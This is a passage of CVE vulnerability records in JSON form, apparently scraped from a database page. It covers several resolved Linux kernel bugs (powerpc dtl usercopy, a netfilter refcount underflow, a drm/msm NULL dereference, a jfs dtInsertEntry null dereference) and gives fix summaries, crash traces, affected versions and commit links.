],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "a7b952941ce07e1e7a2cafd08c64a98e14f553e6",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "6b16098148ea58a67430d90e20476be2377c3acd",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "e59822f9d700349cd17968d22c979db23a2d347f",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "1ee68686d1e2a5da35d5650be0be1ce06fe2ceb2",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "e512a59b472684d8585125101ab03b86c2c1348a",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "0f5892212c27be31792ef1daa89c8dac1b3047e4",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "1a14150e1656f7a332a943154fc486504db4d586",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"arch/powerpc/platforms/pseries/setup.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.281",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.223",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.164",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.101",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.42",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.281",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.223",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.164",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.101",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.42",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/pseries: Whitelist dtl slub object for copying to userspace\n\nReading the dispatch trace log from /sys/kernel/debug/powerpc/dtl/cpu-*\nresults in a BUG() when the config CONFIG_HARDENED_USERCOPY is enabled as\nshown below.\n\n kernel BUG at mm/usercopy.c:102!\n Oops: Exception in kernel mode, sig: 5 [#1]\n LE PAGE_SIZE=64K MMU=Radix SMP NR_CPUS=2048 NUMA pSeries\n Modules linked in: xfs libcrc32c dm_service_time sd_mod t10_pi sg ibmvfc\n scsi_transport_fc ibmveth pseries_wdt dm_multipath dm_mirror dm_region_hash dm_log dm_mod fuse\n CPU: 27 PID: 1815 Comm: python3 Not tainted 6.10.0-rc3 #85\n Hardware name: IBM,9040-MRX POWER10 (raw) 0x800200 0xf000006 of:IBM,FW1060.00 (NM1060_042) hv:phyp pSeries\n NIP: c0000000005d23d4 LR: c0000000005d23d0 CTR: 00000000006ee6f8\n REGS: c000000120c078c0 TRAP: 0700 Not tainted (6.10.0-rc3)\n MSR: 8000000000029033 \u003cSF,EE,ME,IR,DR,RI,LE\u003e CR: 2828220f XER: 0000000e\n CFAR: c0000000001fdc80 IRQMASK: 0\n [ ... GPRs omitted ... ]\n NIP [c0000000005d23d4] usercopy_abort+0x78/0xb0\n LR [c0000000005d23d0] usercopy_abort+0x74/0xb0\n Call Trace:\n usercopy_abort+0x74/0xb0 (unreliable)\n __check_heap_object+0xf8/0x120\n check_heap_object+0x218/0x240\n __check_object_size+0x84/0x1a4\n dtl_file_read+0x17c/0x2c4\n full_proxy_read+0x8c/0x110\n vfs_read+0xdc/0x3a0\n ksys_read+0x84/0x144\n system_call_exception+0x124/0x330\n system_call_vectored_common+0x15c/0x2ec\n --- interrupt: 3000 at 0x7fff81f3ab34\n\nCommit 6d07d1cd300f (\"usercopy: Restrict non-usercopy caches to size 0\")\nrequires that only whitelisted areas in slab/slub objects can be copied to\nuserspace when usercopy hardening is enabled using CONFIG_HARDENED_USERCOPY.\nDtl contains hypervisor dispatch events which are expected to be read by\nprivileged users. Hence mark this safe for user access.\nSpecify useroffset=0 and usersize=DISPATCH_LOG_BYTES to whitelist the\nentire object."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:21:18.670Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/a7b952941ce07e1e7a2cafd08c64a98e14f553e6"
},
{
"url": "https://git.kernel.org/stable/c/6b16098148ea58a67430d90e20476be2377c3acd"
},
{
"url": "https://git.kernel.org/stable/c/e59822f9d700349cd17968d22c979db23a2d347f"
},
{
"url": "https://git.kernel.org/stable/c/1ee68686d1e2a5da35d5650be0be1ce06fe2ceb2"
},
{
"url": "https://git.kernel.org/stable/c/e512a59b472684d8585125101ab03b86c2c1348a"
},
{
"url": "https://git.kernel.org/stable/c/0f5892212c27be31792ef1daa89c8dac1b3047e4"
},
{
"url": "https://git.kernel.org/stable/c/1a14150e1656f7a332a943154fc486504db4d586"
}
],
"title": "powerpc/pseries: Whitelist dtl slub object for copying to userspace",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-41065",
"datePublished": "2024-07-29T14:57:27.011Z",
"dateReserved": "2024-07-12T12:17:45.628Z",
"dateUpdated": "2025-05-04T09:21:18.670Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27403 (GCVE-0-2024-27403)
Vulnerability from cvelistv5
Published
2024-05-17 11:40
Modified
2025-05-04 09:04
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nft_flow_offload: reset dst in route object after setting up flow
dst is transferred to the flow object, route object does not own it
anymore. Reset dst in route object, otherwise if flow_offload_add()
fails, error path releases dst twice, leading to a refcount underflow.
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27403",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-17T17:17:07.998820Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:46:43.380Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:34:52.105Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4c167af9f6b5ae4a5dbc243d5983c295ccc2e43c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/012df10717da02367aaf92c65f9c89db206c15f4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/558b00a30e05753a62ecc7e05e939ca8f0241148"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/670548c8db44d76e40e1dfc06812bca36a61e9ae"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9e0f0430389be7696396c62f037be4bf72cf93e3"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"include/net/netfilter/nf_flow_table.h",
"net/netfilter/nf_flow_table_core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "4c167af9f6b5ae4a5dbc243d5983c295ccc2e43c",
"status": "affected",
"version": "a3c90f7a2323b331ae816d5b0633e68148e25d04",
"versionType": "git"
},
{
"lessThan": "012df10717da02367aaf92c65f9c89db206c15f4",
"status": "affected",
"version": "a3c90f7a2323b331ae816d5b0633e68148e25d04",
"versionType": "git"
},
{
"lessThan": "558b00a30e05753a62ecc7e05e939ca8f0241148",
"status": "affected",
"version": "a3c90f7a2323b331ae816d5b0633e68148e25d04",
"versionType": "git"
},
{
"lessThan": "670548c8db44d76e40e1dfc06812bca36a61e9ae",
"status": "affected",
"version": "a3c90f7a2323b331ae816d5b0633e68148e25d04",
"versionType": "git"
},
{
"lessThan": "9e0f0430389be7696396c62f037be4bf72cf93e3",
"status": "affected",
"version": "a3c90f7a2323b331ae816d5b0633e68148e25d04",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"include/net/netfilter/nf_flow_table.h",
"net/netfilter/nf_flow_table_core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.16"
},
{
"lessThan": "4.16",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.150",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.80",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.19",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.150",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.80",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.19",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.7",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nft_flow_offload: reset dst in route object after setting up flow\n\ndst is transferred to the flow object, route object does not own it\nanymore. Reset dst in route object, otherwise if flow_offload_add()\nfails, error path releases dst twice, leading to a refcount underflow."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:04:21.899Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/4c167af9f6b5ae4a5dbc243d5983c295ccc2e43c"
},
{
"url": "https://git.kernel.org/stable/c/012df10717da02367aaf92c65f9c89db206c15f4"
},
{
"url": "https://git.kernel.org/stable/c/558b00a30e05753a62ecc7e05e939ca8f0241148"
},
{
"url": "https://git.kernel.org/stable/c/670548c8db44d76e40e1dfc06812bca36a61e9ae"
},
{
"url": "https://git.kernel.org/stable/c/9e0f0430389be7696396c62f037be4bf72cf93e3"
}
],
"title": "netfilter: nft_flow_offload: reset dst in route object after setting up flow",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27403",
"datePublished": "2024-05-17T11:40:17.992Z",
"dateReserved": "2024-02-25T13:47:42.681Z",
"dateUpdated": "2025-05-04T09:04:21.899Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52911 (GCVE-0-2023-52911)
Vulnerability from cvelistv5
Published
2024-08-21 06:10
Modified
2025-05-04 12:49
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/msm: another fix for the headless Adreno GPU
Fix another oops reproducible when rebooting the board with the Adreno
GPU working in the headless mode (e.g. iMX platforms).
Unable to handle kernel NULL pointer dereference at virtual address 00000000 when read
[00000000] *pgd=74936831, *pte=00000000, *ppte=00000000
Internal error: Oops: 17 [#1] ARM
CPU: 0 PID: 51 Comm: reboot Not tainted 6.2.0-rc1-dirty #11
Hardware name: Freescale i.MX53 (Device Tree Support)
PC is at msm_atomic_commit_tail+0x50/0x970
LR is at commit_tail+0x9c/0x188
pc : [<c06aa430>] lr : [<c067a214>] psr: 600e0013
sp : e0851d30 ip : ee4eb7eb fp : 00090acc
r10: 00000058 r9 : c2193014 r8 : c4310000
r7 : c4759380 r6 : 07bef61d r5 : 00000000 r4 : 00000000
r3 : c44cc440 r2 : 00000000 r1 : 00000000 r0 : 00000000
Flags: nZCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment none
Control: 10c5387d Table: 74910019 DAC: 00000051
Register r0 information: NULL pointer
Register r1 information: NULL pointer
Register r2 information: NULL pointer
Register r3 information: slab kmalloc-1k start c44cc400 pointer offset 64 size 1024
Register r4 information: NULL pointer
Register r5 information: NULL pointer
Register r6 information: non-paged memory
Register r7 information: slab kmalloc-128 start c4759380 pointer offset 0 size 128
Register r8 information: slab kmalloc-2k start c4310000 pointer offset 0 size 2048
Register r9 information: non-slab/vmalloc memory
Register r10 information: non-paged memory
Register r11 information: non-paged memory
Register r12 information: non-paged memory
Process reboot (pid: 51, stack limit = 0xc80046d9)
Stack: (0xe0851d30 to 0xe0852000)
1d20: c4759380 fbd77200 000005ff 002b9c70
1d40: c4759380 c4759380 00000000 07bef61d 00000600 c0d6fe7c c2193014 00000058
1d60: 00090acc c067a214 00000000 c4759380 c4310000 00000000 c44cc854 c067a89c
1d80: 00000000 00000000 00000000 c4310468 00000000 c4759380 c4310000 c4310468
1da0: c4310470 c0643258 c4759380 00000000 00000000 c0c4ee24 00000000 c44cc810
1dc0: 00000000 c0c4ee24 00000000 c44cc810 00000000 0347d2a8 e0851e00 e0851e00
1de0: c4759380 c067ad20 c4310000 00000000 c44cc810 c27f8718 c44cc854 c067adb8
1e00: c4933000 00000002 00000001 00000000 00000000 c2130850 00000000 c2130854
1e20: c25fc488 00000000 c0ff162c 00000000 00000001 00000002 00000000 00000000
1e40: c43102c0 c43102c0 00000000 0347d2a8 c44cc810 c44cc814 c2133da8 c06d1a60
1e60: 00000000 00000000 00079028 c2012f24 fee1dead c4933000 00000058 c01431e4
1e80: 01234567 c0143a20 00000000 00000000 00000000 00000000 00000000 00000000
1ea0: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
1ec0: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
1ee0: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
1f00: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
1f20: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
1f40: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
1f60: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
1f80: 00000000 00000000 00000000 0347d2a8 00000002 00000004 00000078 00000058
1fa0: c010028c c0100060 00000002 00000004 fee1dead 28121969 01234567 00079028
1fc0: 00000002 00000004 00000078 00000058 0002fdc5 00000000 00000000 00090acc
1fe0: 00000058 becc9c64 b6e97e05 b6e0e5f6 600e0030 fee1dead 00000000 00000000
msm_atomic_commit_tail from commit_tail+0x9c/0x188
commit_tail from drm_atomic_helper_commit+0x160/0x188
drm_atomic_helper_commit from drm_atomic_commit+0xac/0xe0
drm_atomic_commit from drm_atomic_helper_disable_all+0x1b0/0x1c0
drm_atomic_helper_disable_all from drm_atomic_helper_shutdown+0x88/0x140
drm_atomic_helper_shutdown from device_shutdown+0x16c/0x240
device_shutdown from kernel_restart+0x38/0x90
kernel_restart from __do_sys_reboot+0x
---truncated---
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52911",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:34:48.964677Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:03.382Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/msm/msm_drv.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b107b08c41b3076a508113fbaaffe15ce1fe7f65",
"status": "affected",
"version": "0a58d2ae572adaec8d046f8d35b40c2c32ac7468",
"versionType": "git"
},
{
"lessThan": "00dd060ab3cf95ca6ede7853bc14397014971b5e",
"status": "affected",
"version": "0a58d2ae572adaec8d046f8d35b40c2c32ac7468",
"versionType": "git"
},
{
"status": "affected",
"version": "26f9a766f87b33c50ed400a9500cc1dc9aced953",
"versionType": "git"
},
{
"status": "affected",
"version": "0e6649a2e31ac157c711d583ec8f5ec59da5de0e",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/msm/msm_drv.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.1"
},
{
"lessThan": "6.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.7",
"versionStartIncluding": "6.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.2",
"versionStartIncluding": "6.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.19.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.0.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/msm: another fix for the headless Adreno GPU\n\nFix another oops reproducible when rebooting the board with the Adreno\nGPU working in the headless mode (e.g. iMX platforms).\n\nUnable to handle kernel NULL pointer dereference at virtual address 00000000 when read\n[00000000] *pgd=74936831, *pte=00000000, *ppte=00000000\nInternal error: Oops: 17 [#1] ARM\nCPU: 0 PID: 51 Comm: reboot Not tainted 6.2.0-rc1-dirty #11\nHardware name: Freescale i.MX53 (Device Tree Support)\nPC is at msm_atomic_commit_tail+0x50/0x970\nLR is at commit_tail+0x9c/0x188\npc : [\u003cc06aa430\u003e] lr : [\u003cc067a214\u003e] psr: 600e0013\nsp : e0851d30 ip : ee4eb7eb fp : 00090acc\nr10: 00000058 r9 : c2193014 r8 : c4310000\nr7 : c4759380 r6 : 07bef61d r5 : 00000000 r4 : 00000000\nr3 : c44cc440 r2 : 00000000 r1 : 00000000 r0 : 00000000\nFlags: nZCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment none\nControl: 10c5387d Table: 74910019 DAC: 00000051\nRegister r0 information: NULL pointer\nRegister r1 information: NULL pointer\nRegister r2 information: NULL pointer\nRegister r3 information: slab kmalloc-1k start c44cc400 pointer offset 64 size 1024\nRegister r4 information: NULL pointer\nRegister r5 information: NULL pointer\nRegister r6 information: non-paged memory\nRegister r7 information: slab kmalloc-128 start c4759380 pointer offset 0 size 128\nRegister r8 information: slab kmalloc-2k start c4310000 pointer offset 0 size 2048\nRegister r9 information: non-slab/vmalloc memory\nRegister r10 information: non-paged memory\nRegister r11 information: non-paged memory\nRegister r12 information: non-paged memory\nProcess reboot (pid: 51, stack limit = 0xc80046d9)\nStack: (0xe0851d30 to 0xe0852000)\n1d20: c4759380 fbd77200 000005ff 002b9c70\n1d40: c4759380 c4759380 00000000 07bef61d 00000600 c0d6fe7c c2193014 00000058\n1d60: 00090acc c067a214 00000000 c4759380 c4310000 00000000 c44cc854 c067a89c\n1d80: 00000000 00000000 00000000 c4310468 00000000 c4759380 c4310000 c4310468\n1da0: c4310470 c0643258 c4759380 00000000 00000000 c0c4ee24 00000000 c44cc810\n1dc0: 00000000 c0c4ee24 00000000 c44cc810 00000000 0347d2a8 e0851e00 e0851e00\n1de0: c4759380 c067ad20 c4310000 00000000 c44cc810 c27f8718 c44cc854 c067adb8\n1e00: c4933000 00000002 00000001 00000000 00000000 c2130850 00000000 c2130854\n1e20: c25fc488 00000000 c0ff162c 00000000 00000001 00000002 00000000 00000000\n1e40: c43102c0 c43102c0 00000000 0347d2a8 c44cc810 c44cc814 c2133da8 c06d1a60\n1e60: 00000000 00000000 00079028 c2012f24 fee1dead c4933000 00000058 c01431e4\n1e80: 01234567 c0143a20 00000000 00000000 00000000 00000000 00000000 00000000\n1ea0: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000\n1ec0: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000\n1ee0: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000\n1f00: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000\n1f20: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000\n1f40: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000\n1f60: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000\n1f80: 00000000 00000000 00000000 0347d2a8 00000002 00000004 00000078 00000058\n1fa0: c010028c c0100060 00000002 00000004 fee1dead 28121969 01234567 00079028\n1fc0: 00000002 00000004 00000078 00000058 0002fdc5 00000000 00000000 00090acc\n1fe0: 00000058 becc9c64 b6e97e05 b6e0e5f6 600e0030 fee1dead 00000000 00000000\n msm_atomic_commit_tail from commit_tail+0x9c/0x188\n commit_tail from drm_atomic_helper_commit+0x160/0x188\n drm_atomic_helper_commit from drm_atomic_commit+0xac/0xe0\n drm_atomic_commit from drm_atomic_helper_disable_all+0x1b0/0x1c0\n drm_atomic_helper_disable_all from drm_atomic_helper_shutdown+0x88/0x140\n drm_atomic_helper_shutdown from device_shutdown+0x16c/0x240\n device_shutdown from kernel_restart+0x38/0x90\n kernel_restart from __do_sys_reboot+0x\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:49:50.903Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b107b08c41b3076a508113fbaaffe15ce1fe7f65"
},
{
"url": "https://git.kernel.org/stable/c/00dd060ab3cf95ca6ede7853bc14397014971b5e"
}
],
"title": "drm/msm: another fix for the headless Adreno GPU",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52911",
"datePublished": "2024-08-21T06:10:52.403Z",
"dateReserved": "2024-08-21T06:07:11.016Z",
"dateUpdated": "2025-05-04T12:49:50.903Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-44939 (GCVE-0-2024-44939)
Vulnerability from cvelistv5
Published
2024-08-26 11:20
Modified
2025-07-17 16:55
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
jfs: fix null ptr deref in dtInsertEntry
[syzbot reported]
general protection fault, probably for non-canonical address 0xdffffc0000000001: 0000 [#1] PREEMPT SMP KASAN PTI
KASAN: null-ptr-deref in range [0x0000000000000008-0x000000000000000f]
CPU: 0 PID: 5061 Comm: syz-executor404 Not tainted 6.8.0-syzkaller-08951-gfe46a7dd189e #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 03/27/2024
RIP: 0010:dtInsertEntry+0xd0c/0x1780 fs/jfs/jfs_dtree.c:3713
...
[Analyze]
In dtInsertEntry(), when the pointer h has the same value as p, after writing
name in UniStrncpy_to_le(), p->header.flag will be cleared. This will cause the
previously true judgment "p->header.flag & BT-LEAF" to change to no after writing
the name operation, this leads to entering an incorrect branch and accessing the
uninitialized object ih when judging this condition for the second time.
[Fix]
After got the page, check freelist first, if freelist == 0 then exit dtInsert()
and return -EINVAL.
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-44939",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:27:35.487089Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:06.654Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/jfs/jfs_dtree.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f98bf80b20f4a930589cda48a35f751a64fe0dc2",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "53023ab11836ac56fd75f7a71ec1356e50920fa9",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "6ea10dbb1e6c58384136e9adfd75f81951e423f6",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "9c2ac38530d1a3ee558834dfa16c85a40fd0e702",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "ce6dede912f064a855acf6f04a04cbb2c25b8c8c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/jfs/jfs_dtree.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.189",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.107",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.47",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
